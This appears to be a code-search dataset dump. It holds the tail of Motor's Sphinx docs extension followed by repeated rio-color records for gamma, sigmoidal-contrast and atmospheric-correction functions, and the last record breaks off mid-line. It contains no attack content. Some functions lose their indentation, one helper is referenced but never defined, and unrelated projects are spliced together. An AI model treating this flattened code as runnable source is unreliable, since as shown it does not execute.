# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Motor specific extensions to Sphinx."""
import re
from docutils.nodes import doctest_block, literal_block
from sphinx import addnodes
from sphinx.addnodes import (desc,
desc_content,
desc_signature,
seealso,
versionmodified)
from sphinx.util.inspect import safe_getattr
import motor
import motor.core
# This is a place to store info while parsing, to be used before generating.
motor_info = {}
def has_node_of_type(root, klass):
    """Return True if *root* or any descendant (via the ``children``
    attribute) is an instance of *klass*."""
    if isinstance(root, klass):
        return True

    # Depth-first search; short-circuits on the first match.
    return any(has_node_of_type(node, klass) for node in root.children)
def find_by_path(root, classes):
    """Collect descendants of *root* reached by matching one class from
    *classes* per level of ``children``. An empty *classes* list matches
    *root* itself."""
    if not classes:
        return [root]

    head, tail = classes[0], classes[1:]
    matches = []
    for node in root.children:
        if isinstance(node, head):
            matches += find_by_path(node, tail)
    return matches
docstring_warnings = []
def maybe_warn_about_code_block(name, content_node):
    # Record names of docstrings containing literal or doctest blocks;
    # they are reported at the end of the build (see build_finished).
    if has_node_of_type(content_node, (literal_block, doctest_block)):
        docstring_warnings.append(name)
def has_coro_annotation(signature_node):
    """Return True if the signature's first annotation already contains
    the word 'coroutine' (avoids adding a duplicate annotation)."""
    try:
        annotation = signature_node[0][0]
    except IndexError:
        # No annotation node at all.
        return False

    return 'coroutine' in annotation
def process_motor_nodes(app, doctree):
    # Search doctree for Motor's methods and attributes whose docstrings were
    # copied from PyMongo, and fix them up for Motor:
    #   1. Add a 'coroutine' annotation to the beginning of the declaration.
    #   2. Remove all version annotations like "New in version 2.0" since
    #      PyMongo's version numbers are meaningless in Motor's docs.
    #   3. Remove "seealso" directives that reference PyMongo's docs.
    #
    # We do this here, rather than by registering a callback to Sphinx's
    # 'autodoc-process-signature' event, because it's way easier to handle the
    # parsed doctree before it's turned into HTML than it is to update the RST.
    for objnode in doctree.traverse(desc):
        if objnode['objtype'] in ('method', 'attribute'):
            signature_node = find_by_path(objnode, [desc_signature])[0]
            name = '.'.join([
                signature_node['module'], signature_node['fullname']])

            assert name.startswith('motor.')
            obj_motor_info = motor_info.get(name)
            if obj_motor_info:
                desc_content_node = find_by_path(objnode, [desc_content])[0]
                # line is None for docstrings copied from PyMongo, so flag
                # any code blocks they contain for manual review.
                if (desc_content_node.line is None and
                        obj_motor_info['is_pymongo_docstring']):
                    maybe_warn_about_code_block(name, desc_content_node)

                if obj_motor_info['is_async_method']:
                    # Might be a handwritten RST with "coroutine" already.
                    if not has_coro_annotation(signature_node):
                        coro_annotation = addnodes.desc_annotation(
                            'coroutine ', 'coroutine ',
                            classes=['coro-annotation'])
                        signature_node.insert(0, coro_annotation)

                if obj_motor_info['is_pymongo_docstring']:
                    # Remove all "versionadded", "versionchanged" and
                    # "deprecated" directives from the docs we imported from
                    # PyMongo
                    version_nodes = find_by_path(
                        desc_content_node, [versionmodified])

                    for version_node in version_nodes:
                        version_node.parent.remove(version_node)

                    # Remove all "seealso" directives that contain :doc:
                    # references from PyMongo's docs
                    seealso_nodes = find_by_path(desc_content_node, [seealso])

                    for seealso_node in seealso_nodes:
                        if 'reftype="doc"' in str(seealso_node):
                            seealso_node.parent.remove(seealso_node)
pymongo_ref_pat = re.compile(r':doc:`(.*?)`', re.MULTILINE)
def _sub_pymongo_ref(match):
ref = match.group(1)
return ':doc:`%s`' % ref.lstrip('/')
def process_motor_docstring(app, what, name, obj, options, lines):
    """autodoc-process-docstring hook: fix up :doc: references in
    docstrings Motor copied from PyMongo. Mutates *lines* in place."""
    info = motor_info.get(name)
    if info is None or not info.get('is_pymongo_docstring'):
        return

    text = '\n'.join(lines)
    lines[:] = pymongo_ref_pat.sub(_sub_pymongo_ref, text).split('\n')
def build_finished(app, exception):
    """build-finished hook: report docstrings flagged for manual review."""
    # Skip the report if the build failed or nothing was flagged.
    if exception or not docstring_warnings:
        return

    print("PyMongo docstrings with code blocks that need update:")
    for name in sorted(docstring_warnings):
        print(name)
def setup(app):
app.add_autodoc_attrgetter(type(motor.core.AgnosticBase), get_motor_attr)
app.connect('autodoc-process-docstring', process_motor_docstring)
app.connect('doctree-read', process_motor_nodes)
app.connect('build-finished', build_finished)
return {'parallel_write_safe': True, 'parallel_read_safe': False}
|
mapbox/rio-color | rio_color/operations.py | sigmoidal | python | def sigmoidal(arr, contrast, bias):
r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
raise ValueError("bias must be a scalar float between 0 and 1")
alpha, beta = bias, contrast
# We use the names a and b to match documentation.
if alpha == 0:
alpha = epsilon
if beta == 0:
return arr
np.seterr(divide="ignore", invalid="ignore")
if beta > 0:
numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
1 + np.exp(beta * alpha)
)
denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
1 + np.exp(beta * alpha)
)
output = numerator / denominator
else:
# Inverse sigmoidal function:
# todo: account for 0s
# todo: formatting ;)
output = (
(beta * alpha)
- np.log(
(
1
/ (
(arr / (1 + np.exp(beta * alpha - beta)))
- (arr / (1 + np.exp(beta * alpha)))
+ (1 / (1 + np.exp(beta * alpha)))
)
)
- 1
)
) / beta
return output | r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L9-L97 | null | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def gamma(arr, g):
r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4.
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if g <= 0 or np.isnan(g):
raise ValueError("gamma must be greater than 0")
return arr ** (1.0 / g)
def saturation(arr, proportion):
"""Apply saturation to an RGB array (in LCH color space)
Multiply saturation by proportion in LCH color space to adjust the intensity
of color in the image. As saturation increases, colors appear
more "pure." As saturation decreases, colors appear more "washed-out."
Parameters
----------
arr: ndarray with shape (3, ..., ...)
proportion: number
"""
if arr.shape[0] != 3:
raise ValueError("saturation requires a 3-band array")
return saturate_rgb(arr, proportion)
def simple_atmo_opstring(haze, contrast, bias):
"""Make a simple atmospheric correction formula."""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
ops = (
"gamma g {gamma_g}, " "gamma b {gamma_b}, " "sigmoidal rgb {contrast} {bias}"
).format(gamma_g=gamma_g, gamma_b=gamma_b, contrast=contrast, bias=bias)
return ops
def simple_atmo(rgb, haze, contrast, bias):
"""
A simple, static (non-adaptive) atmospheric correction function.
Parameters
----------
haze: float
Amount of haze to adjust for. For example, 0.03
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5 or 50%)
"""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
arr = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
arr[0] = rgb[0]
arr[1] = gamma(rgb[1], gamma_g)
arr[2] = gamma(rgb[2], gamma_b)
output = rgb.copy()
output[0:3] = sigmoidal(arr, contrast, bias)
return output
def _op_factory(func, kwargs, opname, bands, rgb_op=False):
"""create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays
"""
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f
def parse_operations(ops_string):
"""Takes a string of operations written with a handy DSL
"OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"
And returns a list of functions, each of which take and return ndarrays
"""
band_lookup = {"r": 1, "g": 2, "b": 3}
count = len(band_lookup)
opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
opkwargs = {
"saturation": ("proportion",),
"sigmoidal": ("contrast", "bias"),
"gamma": ("g",),
}
# Operations that assume RGB colorspace
rgb_ops = ("saturation",)
# split into tokens, commas are optional whitespace
tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
operations = []
current = []
for token in tokens:
if token.lower() in opfuncs.keys():
if len(current) > 0:
operations.append(current)
current = []
current.append(token.lower())
if len(current) > 0:
operations.append(current)
result = []
for parts in operations:
opname = parts[0]
bandstr = parts[1]
args = parts[2:]
try:
func = opfuncs[opname]
except KeyError:
raise ValueError("{} is not a valid operation".format(opname))
if opname in rgb_ops:
# ignore bands, assumed to be in rgb
# push 2nd arg into args
args = [bandstr] + args
bands = (1, 2, 3)
else:
# 2nd arg is bands
# parse r,g,b ~= 1,2,3
bands = set()
for bs in bandstr:
try:
band = int(bs)
except ValueError:
band = band_lookup[bs.lower()]
if band < 1 or band > count:
raise ValueError(
"{} BAND must be between 1 and {}".format(opname, count)
)
bands.add(band)
# assume all args are float
args = [float(arg) for arg in args]
kwargs = dict(zip(opkwargs[opname], args))
# Create opperation function
f = _op_factory(
func=func,
kwargs=kwargs,
opname=opname,
bands=bands,
rgb_op=(opname in rgb_ops),
)
result.append(f)
return result
|
mapbox/rio-color | rio_color/operations.py | gamma | python | def gamma(arr, g):
r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4.
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if g <= 0 or np.isnan(g):
raise ValueError("gamma must be greater than 0")
return arr ** (1.0 / g) | r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4. | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L100-L123 | null | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def sigmoidal(arr, contrast, bias):
r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
raise ValueError("bias must be a scalar float between 0 and 1")
alpha, beta = bias, contrast
# We use the names a and b to match documentation.
if alpha == 0:
alpha = epsilon
if beta == 0:
return arr
np.seterr(divide="ignore", invalid="ignore")
if beta > 0:
numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
1 + np.exp(beta * alpha)
)
denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
1 + np.exp(beta * alpha)
)
output = numerator / denominator
else:
# Inverse sigmoidal function:
# todo: account for 0s
# todo: formatting ;)
output = (
(beta * alpha)
- np.log(
(
1
/ (
(arr / (1 + np.exp(beta * alpha - beta)))
- (arr / (1 + np.exp(beta * alpha)))
+ (1 / (1 + np.exp(beta * alpha)))
)
)
- 1
)
) / beta
return output
def saturation(arr, proportion):
"""Apply saturation to an RGB array (in LCH color space)
Multiply saturation by proportion in LCH color space to adjust the intensity
of color in the image. As saturation increases, colors appear
more "pure." As saturation decreases, colors appear more "washed-out."
Parameters
----------
arr: ndarray with shape (3, ..., ...)
proportion: number
"""
if arr.shape[0] != 3:
raise ValueError("saturation requires a 3-band array")
return saturate_rgb(arr, proportion)
def simple_atmo_opstring(haze, contrast, bias):
"""Make a simple atmospheric correction formula."""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
ops = (
"gamma g {gamma_g}, " "gamma b {gamma_b}, " "sigmoidal rgb {contrast} {bias}"
).format(gamma_g=gamma_g, gamma_b=gamma_b, contrast=contrast, bias=bias)
return ops
def simple_atmo(rgb, haze, contrast, bias):
"""
A simple, static (non-adaptive) atmospheric correction function.
Parameters
----------
haze: float
Amount of haze to adjust for. For example, 0.03
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5 or 50%)
"""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
arr = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
arr[0] = rgb[0]
arr[1] = gamma(rgb[1], gamma_g)
arr[2] = gamma(rgb[2], gamma_b)
output = rgb.copy()
output[0:3] = sigmoidal(arr, contrast, bias)
return output
def _op_factory(func, kwargs, opname, bands, rgb_op=False):
"""create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays
"""
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f
def parse_operations(ops_string):
"""Takes a string of operations written with a handy DSL
"OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"
And returns a list of functions, each of which take and return ndarrays
"""
band_lookup = {"r": 1, "g": 2, "b": 3}
count = len(band_lookup)
opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
opkwargs = {
"saturation": ("proportion",),
"sigmoidal": ("contrast", "bias"),
"gamma": ("g",),
}
# Operations that assume RGB colorspace
rgb_ops = ("saturation",)
# split into tokens, commas are optional whitespace
tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
operations = []
current = []
for token in tokens:
if token.lower() in opfuncs.keys():
if len(current) > 0:
operations.append(current)
current = []
current.append(token.lower())
if len(current) > 0:
operations.append(current)
result = []
for parts in operations:
opname = parts[0]
bandstr = parts[1]
args = parts[2:]
try:
func = opfuncs[opname]
except KeyError:
raise ValueError("{} is not a valid operation".format(opname))
if opname in rgb_ops:
# ignore bands, assumed to be in rgb
# push 2nd arg into args
args = [bandstr] + args
bands = (1, 2, 3)
else:
# 2nd arg is bands
# parse r,g,b ~= 1,2,3
bands = set()
for bs in bandstr:
try:
band = int(bs)
except ValueError:
band = band_lookup[bs.lower()]
if band < 1 or band > count:
raise ValueError(
"{} BAND must be between 1 and {}".format(opname, count)
)
bands.add(band)
# assume all args are float
args = [float(arg) for arg in args]
kwargs = dict(zip(opkwargs[opname], args))
# Create opperation function
f = _op_factory(
func=func,
kwargs=kwargs,
opname=opname,
bands=bands,
rgb_op=(opname in rgb_ops),
)
result.append(f)
return result
|
mapbox/rio-color | rio_color/operations.py | simple_atmo_opstring | python | def simple_atmo_opstring(haze, contrast, bias):
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
ops = (
"gamma g {gamma_g}, " "gamma b {gamma_b}, " "sigmoidal rgb {contrast} {bias}"
).format(gamma_g=gamma_g, gamma_b=gamma_b, contrast=contrast, bias=bias)
return ops | Make a simple atmospheric correction formula. | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L144-L151 | null | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def sigmoidal(arr, contrast, bias):
r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
raise ValueError("bias must be a scalar float between 0 and 1")
alpha, beta = bias, contrast
# We use the names a and b to match documentation.
if alpha == 0:
alpha = epsilon
if beta == 0:
return arr
np.seterr(divide="ignore", invalid="ignore")
if beta > 0:
numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
1 + np.exp(beta * alpha)
)
denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
1 + np.exp(beta * alpha)
)
output = numerator / denominator
else:
# Inverse sigmoidal function:
# todo: account for 0s
# todo: formatting ;)
output = (
(beta * alpha)
- np.log(
(
1
/ (
(arr / (1 + np.exp(beta * alpha - beta)))
- (arr / (1 + np.exp(beta * alpha)))
+ (1 / (1 + np.exp(beta * alpha)))
)
)
- 1
)
) / beta
return output
def gamma(arr, g):
r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4.
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if g <= 0 or np.isnan(g):
raise ValueError("gamma must be greater than 0")
return arr ** (1.0 / g)
def saturation(arr, proportion):
"""Apply saturation to an RGB array (in LCH color space)
Multiply saturation by proportion in LCH color space to adjust the intensity
of color in the image. As saturation increases, colors appear
more "pure." As saturation decreases, colors appear more "washed-out."
Parameters
----------
arr: ndarray with shape (3, ..., ...)
proportion: number
"""
if arr.shape[0] != 3:
raise ValueError("saturation requires a 3-band array")
return saturate_rgb(arr, proportion)
def simple_atmo(rgb, haze, contrast, bias):
"""
A simple, static (non-adaptive) atmospheric correction function.
Parameters
----------
haze: float
Amount of haze to adjust for. For example, 0.03
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5 or 50%)
"""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
arr = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
arr[0] = rgb[0]
arr[1] = gamma(rgb[1], gamma_g)
arr[2] = gamma(rgb[2], gamma_b)
output = rgb.copy()
output[0:3] = sigmoidal(arr, contrast, bias)
return output
def _op_factory(func, kwargs, opname, bands, rgb_op=False):
"""create an operation function closure
don't call directly, use parse_operations
returns a function which itself takes and returns ndarrays
"""
def f(arr):
# Avoid mutation by copying
newarr = arr.copy()
if rgb_op:
# apply func to array's first 3 bands, assumed r,g,b
# additional band(s) are untouched
newarr[0:3] = func(newarr[0:3], **kwargs)
else:
# apply func to array band at a time
for b in bands:
newarr[b - 1] = func(arr[b - 1], **kwargs)
return newarr
f.__name__ = str(opname)
return f
def parse_operations(ops_string):
"""Takes a string of operations written with a handy DSL
"OPERATION-NAME BANDS ARG1 ARG2 OPERATION-NAME BANDS ARG"
And returns a list of functions, each of which take and return ndarrays
"""
band_lookup = {"r": 1, "g": 2, "b": 3}
count = len(band_lookup)
opfuncs = {"saturation": saturation, "sigmoidal": sigmoidal, "gamma": gamma}
opkwargs = {
"saturation": ("proportion",),
"sigmoidal": ("contrast", "bias"),
"gamma": ("g",),
}
# Operations that assume RGB colorspace
rgb_ops = ("saturation",)
# split into tokens, commas are optional whitespace
tokens = [x.strip() for x in ops_string.replace(",", "").split(" ")]
operations = []
current = []
for token in tokens:
if token.lower() in opfuncs.keys():
if len(current) > 0:
operations.append(current)
current = []
current.append(token.lower())
if len(current) > 0:
operations.append(current)
result = []
for parts in operations:
opname = parts[0]
bandstr = parts[1]
args = parts[2:]
try:
func = opfuncs[opname]
except KeyError:
raise ValueError("{} is not a valid operation".format(opname))
if opname in rgb_ops:
# ignore bands, assumed to be in rgb
# push 2nd arg into args
args = [bandstr] + args
bands = (1, 2, 3)
else:
# 2nd arg is bands
# parse r,g,b ~= 1,2,3
bands = set()
for bs in bandstr:
try:
band = int(bs)
except ValueError:
band = band_lookup[bs.lower()]
if band < 1 or band > count:
raise ValueError(
"{} BAND must be between 1 and {}".format(opname, count)
)
bands.add(band)
# assume all args are float
args = [float(arg) for arg in args]
kwargs = dict(zip(opkwargs[opname], args))
# Create opperation function
f = _op_factory(
func=func,
kwargs=kwargs,
opname=opname,
bands=bands,
rgb_op=(opname in rgb_ops),
)
result.append(f)
return result
|
mapbox/rio-color | rio_color/operations.py | simple_atmo | python | def simple_atmo(rgb, haze, contrast, bias):
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
arr = np.empty(shape=(3, rgb.shape[1], rgb.shape[2]))
arr[0] = rgb[0]
arr[1] = gamma(rgb[1], gamma_g)
arr[2] = gamma(rgb[2], gamma_b)
output = rgb.copy()
output[0:3] = sigmoidal(arr, contrast, bias)
return output | A simple, static (non-adaptive) atmospheric correction function.
Parameters
----------
haze: float
Amount of haze to adjust for. For example, 0.03
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5 or 50%) | train | https://github.com/mapbox/rio-color/blob/4e9d7a9348608e66f9381fcdba98c13050e91c83/rio_color/operations.py#L154-L181 | [
"def gamma(arr, g):\n r\"\"\"\n Gamma correction is a nonlinear operation that\n adjusts the image's channel values pixel-by-pixel according\n to a power-law:\n\n .. math:: pixel_{out} = pixel_{in} ^ {\\gamma}\n\n Setting gamma (:math:`\\gamma`) to be less than 1.0 darkens the image and\n setti... | """Color operations."""
import numpy as np
from .utils import epsilon
from .colorspace import saturate_rgb
# Color manipulation functions
def sigmoidal(arr, contrast, bias):
r"""
Sigmoidal contrast is type of contrast control that
adjusts the contrast without saturating highlights or shadows.
It allows control over two factors:
the contrast range from light to dark, and where the middle value
of the mid-tones falls. The result is a non-linear and smooth
contrast change.
Parameters
----------
arr : ndarray, float, 0 .. 1
Array of color values to adjust
contrast : integer
Enhances the intensity differences between the lighter and darker
elements of the image. For example, 0 is none, 3 is typical and
20 is a lot.
bias : float, between 0 and 1
Threshold level for the contrast function to center on
(typically centered at 0.5)
Notes
----------
Sigmoidal contrast is based on the sigmoidal transfer function:
.. math:: g(u) = ( 1/(1 + e^{- \alpha * u + \beta)})
This sigmoid function is scaled so that the output is bound by
the interval [0, 1].
.. math:: ( 1/(1 + e^(\beta * (\alpha - u))) - 1/(1 + e^(\beta * \alpha)))/
( 1/(1 + e^(\beta*(\alpha - 1))) - 1/(1 + e^(\beta * \alpha)) )
Where :math: `\alpha` is the threshold level, and :math: `\beta` the
contrast factor to be applied.
References
----------
.. [CT] Hany Farid "Fundamentals of Image Processing"
http://www.cs.dartmouth.edu/farid/downloads/tutorials/fip.pdf
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if (bias > 1.0 + epsilon) or (bias < 0 - epsilon):
raise ValueError("bias must be a scalar float between 0 and 1")
alpha, beta = bias, contrast
# We use the names a and b to match documentation.
if alpha == 0:
alpha = epsilon
if beta == 0:
return arr
np.seterr(divide="ignore", invalid="ignore")
if beta > 0:
numerator = 1 / (1 + np.exp(beta * (alpha - arr))) - 1 / (
1 + np.exp(beta * alpha)
)
denominator = 1 / (1 + np.exp(beta * (alpha - 1))) - 1 / (
1 + np.exp(beta * alpha)
)
output = numerator / denominator
else:
# Inverse sigmoidal function:
# todo: account for 0s
# todo: formatting ;)
output = (
(beta * alpha)
- np.log(
(
1
/ (
(arr / (1 + np.exp(beta * alpha - beta)))
- (arr / (1 + np.exp(beta * alpha)))
+ (1 / (1 + np.exp(beta * alpha)))
)
)
- 1
)
) / beta
return output
def gamma(arr, g):
r"""
Gamma correction is a nonlinear operation that
adjusts the image's channel values pixel-by-pixel according
to a power-law:
.. math:: pixel_{out} = pixel_{in} ^ {\gamma}
Setting gamma (:math:`\gamma`) to be less than 1.0 darkens the image and
setting gamma to be greater than 1.0 lightens it.
Parameters
----------
gamma (:math:`\gamma`): float
Reasonable values range from 0.8 to 2.4.
"""
if (arr.max() > 1.0 + epsilon) or (arr.min() < 0 - epsilon):
raise ValueError("Input array must have float values between 0 and 1")
if g <= 0 or np.isnan(g):
raise ValueError("gamma must be greater than 0")
return arr ** (1.0 / g)
def saturation(arr, proportion):
"""Apply saturation to an RGB array (in LCH color space)
Multiply saturation by proportion in LCH color space to adjust the intensity
of color in the image. As saturation increases, colors appear
more "pure." As saturation decreases, colors appear more "washed-out."
Parameters
----------
arr: ndarray with shape (3, ..., ...)
proportion: number
"""
if arr.shape[0] != 3:
raise ValueError("saturation requires a 3-band array")
return saturate_rgb(arr, proportion)
def simple_atmo_opstring(haze, contrast, bias):
"""Make a simple atmospheric correction formula."""
gamma_b = 1 - haze
gamma_g = 1 - (haze / 3.0)
ops = (
"gamma g {gamma_g}, " "gamma b {gamma_b}, " "sigmoidal rgb {contrast} {bias}"
